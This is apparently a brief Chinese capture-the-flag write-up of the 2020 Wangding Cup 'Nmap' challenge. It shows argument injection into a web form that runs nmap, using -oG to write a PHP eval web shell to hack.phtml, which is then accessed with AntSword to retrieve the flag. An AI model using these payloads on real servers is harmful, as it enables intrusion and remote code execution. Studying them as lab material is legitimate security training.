命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
JJay.10 小时前
Android BLE 稳定连接的关键,不是扫描,而是 GATT 操作队列
android·服务器·前端
忒可君10 小时前
C# winform 自制分页功能
android·开发语言·c#
summerkissyou198710 小时前
Android-线程安全-volatile
android·线程
我命由我1234513 小时前
Android 开发中,关于 Gradle 的 distributionUrl 的一些问题
android·java·java-ee·android studio·android jetpack·android-studio·android runtime
su_ym811013 小时前
Android 系统源码阅读与编译构建实战指南
android·framework
方白羽14 小时前
《被封印的六秒:大厂外包破解 Android 启动流之谜》
android·app·android studio
IT乐手16 小时前
java 对比分析对象是否有变化
android·java
做时间的朋友。16 小时前
MySQL 8.0 窗口函数
android·数据库·mysql
举儿16 小时前
通过TRAE工具实现贪吃蛇游戏的全过程
android
守月满空山雪照窗16 小时前
深入理解 MTK FPSGO:Android 游戏帧率治理框架的架构与实现
android·游戏·架构